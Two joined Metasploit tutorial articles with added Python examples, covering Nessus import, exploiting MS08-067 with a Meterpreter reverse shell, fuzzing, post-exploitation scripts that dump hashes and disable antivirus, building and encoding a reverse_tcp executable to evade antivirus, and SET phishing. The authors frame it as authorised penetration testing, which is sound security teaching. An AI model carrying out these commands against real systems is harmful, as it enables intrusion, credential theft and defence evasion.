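What the import step does is reduce the .nessus XML to the address / services / vulns view that hosts and vulns then print. The following is an added example, not Metasploit's importer, that parses a constructed Nessus v2 report (placeholder plugin IDs; the MS08-067 bulletin name is the one used later in this article) into those same columns, treating severity-0 plugins as services only, and filters the result by Nessus severity so the highest-risk findings can be chased first:

```python
"""Read a Nessus v2 (.nessus) report into the host / services / vulns view
that `hosts -c address,svcs,vulns` and `vulns` show after `import`.
Added example, not Metasploit's importer; the report text is constructed
and the plugin IDs are placeholders."""
import xml.etree.ElementTree as ET

SAMPLE_NESSUS = """<NessusClientData_v2>
  <Report name="ftp_target">
    <ReportHost name="192.168.1.5">
      <HostProperties>
        <tag name="host-ip">192.168.1.5</tag>
        <tag name="operating-system">Microsoft Windows XP</tag>
      </HostProperties>
      <ReportItem port="21" svc_name="ftp" protocol="tcp" severity="0"
                  pluginID="PLUGIN-ID-1" pluginName="FTP Server Detection">
        <description>An FTP server is listening on this port.</description>
      </ReportItem>
      <ReportItem port="21" svc_name="ftp" protocol="tcp" severity="2"
                  pluginID="PLUGIN-ID-2"
                  pluginName="FTP Supports Cleartext Authentication">
        <description>Credentials are sent unencrypted.</description>
      </ReportItem>
      <ReportItem port="445" svc_name="cifs" protocol="tcp" severity="4"
                  pluginID="PLUGIN-ID-3"
                  pluginName="MS08-067 Server Service RPC Vulnerability">
        <description>Remote code execution via the Server service.</description>
      </ReportItem>
      <ReportItem port="0" svc_name="general" protocol="tcp" severity="0"
                  pluginID="PLUGIN-ID-4" pluginName="Nessus Scan Information">
        <description>Scan metadata, not tied to a service.</description>
      </ReportItem>
    </ReportHost>
  </Report>
</NessusClientData_v2>
"""

def parse_nessus(xml_text):
    """Return {address: {"os": str, "services": set((port, proto, name)),
    "vulns": [(port, plugin_name, severity)]}}. Severity-0 items are
    informational: they contribute a service (if they name a port) but
    no vulnerability, which keeps the imported `vulns` list meaningful."""
    hosts = {}
    for rh in ET.fromstring(xml_text).iter("ReportHost"):
        props = {t.get("name"): (t.text or "") for t in rh.iter("tag")}
        addr = props.get("host-ip", rh.get("name"))
        entry = {"os": props.get("operating-system", ""), "services": set(), "vulns": []}
        for item in rh.iter("ReportItem"):
            port = int(item.get("port", "0"))
            if port:  # port 0 marks host-level findings with no service behind them
                entry["services"].add((port, item.get("protocol"), item.get("svc_name")))
            sev = int(item.get("severity", "0"))
            if sev > 0:
                entry["vulns"].append((port, item.get("pluginName"), sev))
        hosts[addr] = entry
    return hosts

def hosts_table(hosts):
    """Rows in the shape of `hosts -c address,svcs,vulns`: counts per host."""
    return [(a, len(e["services"]), len(e["vulns"])) for a, e in sorted(hosts.items())]

def vulns_table(hosts, min_severity=1):
    """Rows in the shape of `vulns`, filtered to what is worth chasing first
    (Nessus severity: 1 low, 2 medium, 3 high, 4 critical)."""
    rows = []
    for addr, e in sorted(hosts.items()):
        rows += [(addr, p, n, s) for p, n, s in e["vulns"] if s >= min_severity]
    return rows

if __name__ == "__main__":
    hosts = parse_nessus(SAMPLE_NESSUS)
    print("address        svcs vulns")
    for addr, svcs, vulns in hosts_table(hosts):
        print(f"{addr:14} {svcs:4} {vulns:5}")
    for addr, port, name, sev in vulns_table(hosts, min_severity=3):
        print(f"{addr}:{port} severity={sev} {name}")
```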
Nessus Plugin
There is also a Nessus plugin for Metasploit to control Nessus through the Metasploit Framework. To perform a vulnerability scan using Nessus from within Metasploit, follow these steps:
• Load the Nessus plugin: load nessus
• If you need help, enter nessus_help
• Authenticate to your Nessus server: nessus_connect username:password@host:8834
• List available scan policies by issuing nessus_policy_list
• Launch a new scan with nessus_scan_new followed by the policy number, a name for your scan and your target IP address, for example nessus_scan_new 1 scan_target 192.168.1.5
• Check the scan status while it is running: enter nessus_scan_status
• List the available scan reports after the scan has completed: execute the nessus_report_list command, identify the ID of the report you want to import, and enter nessus_report_get to download the report and import it into the Metasploit database automatically, for example nessus_report_get 1d890f6b-be0d-1e8f-ea6f-fca1ea1402ef9563fbf028305b22 (Figure 11)
Exploitation
If a vulnerable host has been identified, it is time for the real deal. The Metasploit Framework contains hundreds of exploits. Running show exploits from msfconsole will display every exploit available in the Framework. Other valid parameters for the “show” command are all, encoders, nops, exploits, payloads, auxiliary, plugins and options.
Figure 10. nexpose help menu
Exploiting the Target
We are going to attack a Windows XP SP2 machine with exploit MS08-067. To discover if the target machine is vulnerable to this exploit, we are going to use Nmap and the script smb-check-vulns. Fire up your msfconsole and execute nmap -sS -A --script=smb-check-vulns -P0 192.168.1.5.
If your target machine is vulnerable, search for ms08_067_netapi and enable it with use windows/smb/ms08_067_netapi. Now we need to select our payload. We will use the Windows-based Meterpreter reverse TCP payload. To select this payload, execute set PAYLOAD windows/meterpreter/reverse_tcp. To view a list of available payloads for the exploit, execute show payloads (Figure 12).
If everything goes well, a connection will be created from the target machine back to your attacking machine. Reverse TCP allows us to succeed in compromising the target system when the target machine is behind a firewall or NAT and it is impossible to use a bind TCP payload. After selecting the payload we have to specify our target, because this exploit is specific to the operating system version, service pack and language. Execute show targets to see a list of possible exploit targets (Figure 13).
To select your target, execute set TARGET 4, for example. Set the options and type exploit. When you are using a reverse TCP payload, do not forget to turn off your local firewall and check your router to see if it is blocking any port, otherwise you will not see a shell waiting for your commands even if the exploit was successful. If you are attacking a system on the Internet, you will have to use your external IP address in the LHOST option. You should use port 80, 53, 8080 or 443 in the LPORT option: if the target machine is behind a firewall and outbound traffic is filtered, ports 80, 53, 8080 and 443 would likely still be allowed for outgoing connections, whereas the victim's local firewall may drop all unexpected packets on any port other than 80, 53, 8080 or 443. Do not forget to configure your router to redirect all incoming traffic on ports 443, 53, 8080 and 80 to your local IP address (the attacking machine).
Search for Allowed Ports Automatically
If you find it hard to locate a port that is allowed through the firewall, Metasploit offers a payload for this; find it with the command search ports. This payload searches for open ports by trying every available port for an outbound connection until it finds an open one. This process may take quite a long time. If you manage to open one or more sessions, you can list your active sessions by executing sessions -l. To interact with an active session, issue the command sessions -i num, where num is the number of the session. A Meterpreter shell will open, and if we enter shell, we will jump into a Windows command-line shell.
Fuzzing
Fuzzing or fuzz testing is an automated or semi-automated black box software testing technique that automates the process of data generation and injection to discover bugs, crashes, maximum overflow capacities and memory leaks in software applications, protocols, file formats and computer systems by providing invalid, unexpected and random data to the inputs of the system.
Figure 13. Available targets for SMB exploit
Metasploit contains numerous fuzzer modules that can be used to test software applications, computer systems and protocols. To quickly see a list of available fuzzers, run msfconsole, type info auxiliary/fuzzers/ and press the Tab key (Listing 2).
FTP Pre-authentication and Post-authentication Fuzzing
The ftp_pre_post fuzzer module will connect to an FTP server and perform pre-authentication and post-authentication fuzzing. To select this fuzzer module, execute use auxiliary/fuzzers/ftp/ftp_pre_post. Set RHOSTS and run the module, or type show options first to configure the module (Figure 14).
HTTP Form Field Fuzzer
Metasploit provides us with an http_form_field fuzzer module. This module will grab all fields from a form and launch a series of POST actions, fuzzing the contents of the form fields and headers. To use this module, type use auxiliary/fuzzers/http/http_form_field.
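The two steps the module description above compresses, and that the Fuzzing definition earlier talks about in general, are: discover the submittable fields of a form, then generate one malformed request per field while the other fields keep sensible defaults. The following is an added example, not the module's code, of that core against a constructed login page; it only generates the POST bodies and sends nothing, and the handling of anti-CSRF tokens and submit buttons is the author's assumption about what keeps a fuzz case from being rejected before it reaches the handler:

```python
"""Core of an HTML form-field fuzzer like http_form_field: find the fields a
form would submit, then build one POST body per (field, malformed value) pair
with every other field left at its default. Added example, not the module's
code; the HTML is constructed and the cases are generated, not sent."""
from html.parser import HTMLParser
from urllib.parse import urlencode

SAMPLE_HTML = """<html><body>
<form action="/login" method="post">
  <input type="text" name="username" value="">
  <input type="password" name="password">
  <input type="hidden" name="csrf" value="abc123">
  <select name="lang"><option value="en" selected>English</option>
                      <option value="el">Greek</option></select>
  <textarea name="comment">hi</textarea>
  <input type="submit" name="go" value="Log in">
</form></body></html>"""

# Classes of invalid or unexpected input from the fuzzing definition above.
FUZZ_VALUES = [
    "A" * 4096,                   # over-long string: length handling
    "",                           # empty: missing-value handling
    "%s%x%n" * 8,                 # printf-style tokens
    "B" * 8 + "\x00" + "C" * 8,   # embedded NUL byte
    "\u202e\ufeff" + "D" * 8,     # non-ASCII and control code points
    "-" + "9" * 40,               # numeric-looking but huge and negative
]

class FormParser(HTMLParser):
    """Collect action, method and name -> default value for each <form>."""
    def __init__(self):
        super().__init__()
        self.forms = []
        self._form = None
        self._select = None     # name of the <select> currently being read
        self._textarea = None   # name of the <textarea> currently being read

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._form = {"action": a.get("action", ""),
                          "method": (a.get("method") or "get").lower(),
                          "fields": {}, "submits": set()}
        elif self._form is None or tag not in ("input", "select", "textarea", "option"):
            return
        elif tag == "option":
            # The first option is the default unless a later one is marked selected.
            if self._select and ("selected" in a or not self._form["fields"][self._select]):
                self._form["fields"][self._select] = a.get("value") or ""
        elif a.get("name"):
            name = a["name"]
            self._form["fields"][name] = a.get("value") or ""
            if tag == "select":
                self._select = name
            elif tag == "textarea":
                self._textarea = name
            elif (a.get("type") or "").lower() == "submit":
                self._form["submits"].add(name)

    def handle_data(self, data):
        if self._textarea:  # textarea default value is its text content
            self._form["fields"][self._textarea] += data

    def handle_endtag(self, tag):
        if tag == "select":
            self._select = None
        elif tag == "textarea":
            self._textarea = None
        elif tag == "form" and self._form is not None:
            self.forms.append(self._form)
            self._form = None

def parse_forms(html):
    p = FormParser()
    p.feed(html)
    p.close()
    return p.forms

def fuzz_cases(form, skip=("csrf",)):
    """One (field, urlencoded body) per field and fuzz value. Submit buttons and
    the fields in `skip` (anti-CSRF tokens) keep their defaults so the request
    reaches the code that consumes the input instead of being rejected up front."""
    cases = []
    for name in form["fields"]:
        if name in skip or name in form["submits"]:
            continue
        for value in FUZZ_VALUES:
            body = dict(form["fields"])
            body[name] = value
            cases.append((name, urlencode(body)))
    return cases

if __name__ == "__main__":
    form = parse_forms(SAMPLE_HTML)[0]
    print(form["method"].upper(), form["action"], sorted(form["fields"]))
    for field, body in fuzz_cases(form)[:3]:
        print(field, body[:70] + ("..." if len(body) > 70 else ""))
```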
Meterpreter
Meterpreter is an advanced, stealthy, powerful and extensible post-exploitation tool that uses in-memory DLL injection stagers and is extended over the network at runtime. It communicates over the stager socket and provides a comprehensive client-side Ruby API.
Figure 14. Running ftp_pre_post fuzzer
Listing 2. Command executed in the attacker machine
msf > info auxiliary/fuzzers/
info auxiliary/fuzzers/dns/dns_fuzzer
info auxiliary/fuzzers/ftp/client_ftp
info auxiliary/fuzzers/ftp/ftp_pre_post
info auxiliary/fuzzers/http/http_form_field
info auxiliary/fuzzers/http/http_get_uri_long
info auxiliary/fuzzers/http/http_get_uri_strings
info auxiliary/fuzzers/smb/smb2_negotiate_corrupt
info auxiliary/fuzzers/smb/smb_create_pipe
info auxiliary/fuzzers/smb/smb_create_pipe_corrupt
info auxiliary/fuzzers/smb/smb_negotiate_corrupt
info auxiliary/fuzzers/smb/smb_ntlm1_login_corrupt
info auxiliary/fuzzers/smb/smb_tree_connect
info auxiliary/fuzzers/smb/smb_tree_connect_corrupt
info auxiliary/fuzzers/smtp/smtp_fuzzer
info auxiliary/fuzzers/ssh/ssh_kexinit_corrupt
info auxiliary/fuzzers/ssh/ssh_version_15
info auxiliary/fuzzers/ssh/ssh_version_2
info auxiliary/fuzzers/ssh/ssh_version_corrupt
info auxiliary/fuzzers/tds/tds_login_corrupt
info auxiliary/fuzzers/tds/tds_login_username
info auxiliary/fuzzers/wifi/fuzz_beacon
info auxiliary/fuzzers/wifi/fuzz_proberesp
msf > info auxiliary/fuzzers/
Useful Meterpreter third party scripts
Once you have successfully compromised a target, you can use the scripts below within a Meterpreter shell to retrieve valuable information. To run one of them, enter run followed by the name of the script, for example run winenum.
• Grab system information and the entire registry with the scraper script
• Dump tokens, hashes and more with winenum
• Enumerate system information through wmic using remotewinenum
• Add entries to the Windows hosts file using hostsedit
• Get the local subnet mask of the victim with the script get_local_subnets
• Disable most antivirus programs running as a service with the killav script
• The gettelnet script will enable telnet
• Enable RDP with the script getgui
• Disable security measures such as antivirus, firewall and more with getcountermeasure
• Check to see if you exploited a virtual machine with checkvm
Metasploit Database
Every time we run a module, the Metasploit database is updated with data. This is an amazing feature of Metasploit, because it is impossible to remember all this information. There are specific commands to pull information from the Metasploit database; some of them we have already seen during our tests.
Pull information
• hosts command will list all of the hosts in the database
• notes command will output the notes that Metasploit has for each host
• services command will display the identified services on the target machines
• vulns will list all of the discovered vulnerabilities for each target machine
• creds will list all stored credentials
To get more help and details about each command, you can issue the command in msfconsole followed by the parameter -h.
Administering Metasploit Databases
There are also commands to administer databases:
• db_create username:passwd@localhost/dbname, create a new database
• db_connect username:passwd@localhost/dbname, connect to a database
• db_disconnect, disconnect from the database
• db_destroy username:passwd@localhost/dbname, delete the specified database
Conclusion
Although it matters what tools you are using to conduct your penetration testing, it is not all about the tools. Penetration testing requires you to think outside of the box. The key to a successful penetration test is being able to connect and correlate the information that you have managed to collect. There are several different ways to break into systems and a variety of tools to use, but you have to be patient, persistent and creative. Metasploit is an amazing tool with many benefits that will help you achieve your goal, but you will not accomplish anything without hard work and study. And remember, you cannot just download Metasploit and start scanning and exploiting random targets on the Internet. You need written permission from the owner or administrator of the system to conduct a penetration test against it. Be careful, otherwise you may end up behind bars.
GEORGE KARPOUZAS
George Karpouzas is a co-founder of WEBNETSOFT (http://webnetsoft.gr), a software development and IT services company. He has been working as a software developer for the past seven years. He is a security researcher and an information security consultant for WEBNETSOFT, specializing in application security. He holds a bachelor's degree in computer science from Athens University of Economics and Business. You can also find the answers to any security questions on his blog http://securityblog.gr.
Metasploit: An Introduction
The Metasploit Framework is a tool for developing and executing exploit code against a remote target machine. It provides an end-to-end framework for penetration testing: information gathering, vulnerability scanning, pre-exploitation, post-exploitation and exploit development.
Metasploit's greatest advantage is that it is open source and freely extensible. You can customize it by including your own exploits and payloads as needed. A security pentester can check the custom-made applications specific to an enterprise against his customized exploits and payloads. If a security researcher crafts a new attack, then a custom-made payload can carry out most of the attack. Today, software vulnerability advisories are often accompanied by a third-party Metasploit exploit module that highlights the exploitability, risk and remediation of that particular bug.
Architecture of Metasploit
For the sake of simplicity, we shall concentrate only on the Interface and the module part of Metasploit for this article (Figure 1).
Platform Used for demonstration
We are demonstrating Metasploit features with the help of the BackTrack OS. All screenshots of Metasploit in operation were taken there. We have a VMware image of BackTrack 5 R1 with the configuration shown in Figure 2.
We log in to BackTrack 5 R1 with the username root and the password toor. Type startx to load the BackTrack 5 GUI.
Metasploit is typically found at this location in BackTrack OS.
Metasploit Interfaces
• Msfconsole: The console, and the most powerful of all interfaces. It supports multiple sessions.
• Msfcli: Single command interface. Supports only one session.
• Msfd: Provides a network-based interface to msfconsole.
• Msfweb: A web-based interface.
Good Practices for using Metasploit
Updating via Msfupdate
It is always beneficial to have an updated Metasploit Framework before beginning to work with it. This way we stay current on all the exploits and payloads offered for the framework. We use the Msfupdate utility to update the Metasploit Framework.
Here is the path for the Msfupdate utility: Figure 3.
Port scanning via Nmap
It is a good idea to identify the open ports and the services running on them using a versatile tool such as nmap. It gives us a clearer picture of what areas and ports we need to focus our energy on to run the exploit. Knowing the service version number helps us greatly in selecting the known exploits available in Metasploit with their associated payloads.
Here is an example of the nmap scan: Figure 4.
Meterpreter: Metasploit’s Payload
A payload is the piece of software that lets you control a computer system after it has been exploited. It is typically attached to the exploit. Meterpreter is the best known payload of Metasploit.
Meterpreter enables users to control the screen of a device using VNC and to browse, upload and download files.
What do payloads typically allow you to do after execution of an exploit?
• Add a new user to the victim machine
• Open a command prompt on a specific port of the victim system and run commands from there
• Reverse-connect a command shell to issue commands from your end
What is a meterpreter?
Meterpreter is short for “Metasploit Interpreter”. It is a powerful payload that allows you to do many things on the compromised system, such as manipulating local files. It is used to write and execute advanced commands on the default shell of the victim system.
What makes Meterpreter so powerful?
Meterpreter runs “in memory” of the exploited process, which makes it very quiet and stealthy, evading detection by antivirus and other analysis tools. It leaves very small traces on the compromised system while giving the attacker maximum room to carry out activities such as navigating the local file system, port forwarding, tunnelling connections from the victim machine to other systems, pushing entries into the registry, modifying the network configuration, downloading confidential files, etc. In short, once you get Meterpreter running you can do pretty much anything related to the hacked system.
How is this achieved?
Meterpreter achieves this by providing an API against which programmers can write their own extensions, which are uploaded as shared DLLs running within the memory of the exploited process.
How is this helpful to pentesters?
Metasploit, using Meterpreter, avoids executing a new process or sub-process and so maintains the stealthiness of the attack. It comes with built-in commands and extensions that allow obtaining system information, configuring port forwarding, and uploading and executing binaries and DLLs. It largely evades detection by any analysis tool.
Running Metasploit
This is the path for running Metasploit from the BackTrack OS (Figure 5).
Once started, we get the msfconsole as follows: Figure 6.
Methodology for running an exploit from msfconsole commands
• show exploits: This command will give you the extensive list of the exploits available in Metasploit (Figure 7).
• use <exploit name>: Selects the exploit for your victim machine
• show payloads: Gives out the list of available payloads specific to the exploit chosen (Figure 8).
• set PAYLOAD <payload>: Sets the payload which is actually executed after successful execution of your chosen exploit (Figure 9).
• show OPTIONS: Lists out the options such as RHOST and TARGET, followed by the value associated with the selected exploit and payload (Figure 10).
• set options: Sets the OPTIONS for the chosen exploit and payload. Values are typically shown here for each option (Figure 11).
• exploit: Executes the exploit against the target (victim's) system
If the exploit executes successfully, then the payload embedded in it is injected into the victim machine to carry out the intended activity. If unsuccessful, a corresponding error message is shown.
Msfencode
Many times during payload execution we come across “bad” characters, such as the null (0x00) byte or newline characters, which can be trapped by the target application's sanitization filters on received input. This utility helps us to encode the exploit and get rid of bad characters to bypass those input filters. It also significantly reduces the danger of being caught by an IDS.
Figure 5. Run Metasploit
Figure 6. The console
Figure 7. Available exploits
Figure 8. Available payloads
Figure 9. An executed payload
Figure 10. Options
Figure 11. Set the option
Example
Suppose we are producing the Meterpreter executable met.exe as follows:
./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.67 LPORT=4444 X > /var/www/met.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
Length: 290
Options: LHOST=192.168.1.67,LPORT=4444
Now, when we try to download this file from the “victim” PC, we get an error message because our antivirus has detected an intrusion attempt. Let us see what happens when we apply the encoding techniques:
./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.67 LPORT=4444 R | ./msfencode -t exe > /var/www/metenc1.exe
[*] x86/shikata_ga_nai succeeded with size 318 (iteration=1)
Notice that the size of the file changed from Length: 290 to size 318. The highlighted line shows that the encoding succeeded.
How does it help the pentester?
The pentester has more control and flexibility in crafting payloads and sending them to the target. He can now be more creative in encapsulating payloads for delivery to the destination host to achieve the exploit's objective.
Automating the Pentest
We can completely automate a pentest, from scanning remote systems to identify vulnerabilities to launching exploits against those systems.
We have the following options to import reconnaissance data:
• db_import_nessus_nbe: Import an existing Nessus NBE output file
• db_import_nmap_xml: Import data from an existing Nmap XML output file
• db_nmap: Execute Nmap through the framework and store its results in the database
The command db_autopwn references the reconnaissance data, links it up with matching exploit modules, selects exploit modules based on open ports and launches the exploit modules against the matched targets.
Using db_autopwn
See Figure 12.
Auxiliary Module system
The Auxiliary module system is a collection of exploits and modules that add to the core capability of the framework. They are basically suited for information gathering purposes. These are automated scripts performing a certain task. We can specify single or multiple ranges to be targeted. Popular uses are in port scanning, fuzzers, DoS scripts etc.
Popular Auxiliary Modules
• scanner/smb/version: Determine the operating system version and service pack level of a Windows target system using SMB fingerprinting. Use info for more information.
Figure 13. Scanner/discovery/sweep_udp
Figure 14. All modules with scanner/http
• scanner/discovery/sweep_udp: Scans a single host or a specified range of hosts for UDP services and decodes the results, e.g. Figure 13.
Searching Auxiliary modules
We can narrow our search down to a few modules by using the search operator, e.g. search all modules with scanner/http (Figure 14).
How is it helpful to pentesters?
The auxiliary module system allows excellent information gathering activities, matching systems to available exploits, executing exploits, managing multiple exploit sessions, and storing all of this information in a database.
Social Engineer Toolkit
This toolkit was created to fill the gap between penetration testing and social engineering. It helps tremendously to craft a clever malicious file that traps innocent users into clicking on it. The interface is very simple to use. Just select the option number in the menu and we are good to go!
We can access the SET toolkit as follows: Figure 15.
We are greeted with SET toolkit splash screen as: Figure 16.
Now, in this menu-driven program, all we have to do is select our attack vector, craft it as per the instructions and send the link or email to the user. When the innocent user opens the link or attachment, he falls victim to our social engineering tricks and we have easy access to his system.
We can try all the options in the SET toolkit menu and follow the instructions accordingly to launch a successful attack to compromise the victim machine.
How is this helpful to pentesters?
Pentesters can now readily demonstrate to management how an attacker with malicious intent can abuse the trust of the people of the organization to gain access to the most sensitive information. By exploiting and presenting real-world tests on phishing, it can be shown that social engineering is the strongest threat to the organization. Its target is people, not systems, as the way to gain access to confidential information.
General Precautions for using Metasploit
Metasploit is no doubt a very powerful and handy tool for effective and thorough penetration and exploit testing. But if used improperly, it may result in very unpleasant situations where a whole server might be forced to shut down during testing, costing an organization millions. Here are some good practices to follow whenever we are going for penetration and exploit testing.
• Proper backup: It is highly recommended that backups be taken before any penetration exercise is undertaken, else the loss of information and its unavailability for the time being might prove fatal to the business in case something goes wrong. It works as a second line of defense.
• Prior management approval: It is crucial that a proper “written” authorization letter is obtained from management before proceeding with any exploit testing. This removes the burden of facing legal lawsuits in case things go wrong.
• Inform first, and then exploit: The good rule of thumb is to inform senior management about the risk and ask for their call on the issue. If you receive the green signal to proceed with the exploitation part, obtain written approval and then demonstrate.
Figure 15. Access the SET toolkit
Figure 16. SET toolkit screen
• Training: Security awareness is the strongest deterrent for any risk for valuable information leakage. Through the live demonstration of SET inform the IT and other office staff how to stay on guard by not falling victim to the social engineering methods.
Conclusion
Metasploit is helpful in determining whether a given vulnerability is actually exploitable or not. It lets us know if there is actually a risk associated with the vulnerability which can be exploited. This automatically cleans out the false positives that are a typical feature of many automated scanners. Automated scanners do not tell you whether a vulnerability is a potential risk or not, as they do not check it against a known exploit; Metasploit does. Hence, a better risk assessment judgment can be made using Metasploit. Metasploit can also be used by pentesters to demonstrate the potential extent of the damage that an attacker is capable of after a successful break-in, through post-exploitation activities. This also helps us to better rate the severity of the risks associated with the discovered vulnerabilities of the system.
MANASDEEP
Manasdeep currently serves as a Security Analyst in the Security Assessment team at NII Consulting, Mumbai. His work focuses on conducting Security Audits, Vulnerability Assessment and Penetration Testing for NII's premier clients. He has a flair for technical writing and shares his thoughts on his blog “Experiencing Computing...” at http://manasdeeps.blogspot.in. He has also published information security papers in the International Journal of Computer Science and Information Security (IJCSIS) along with various seminar and conference proceedings. He loves to apply innovation freely in his work to find more creative ways to address a given problem.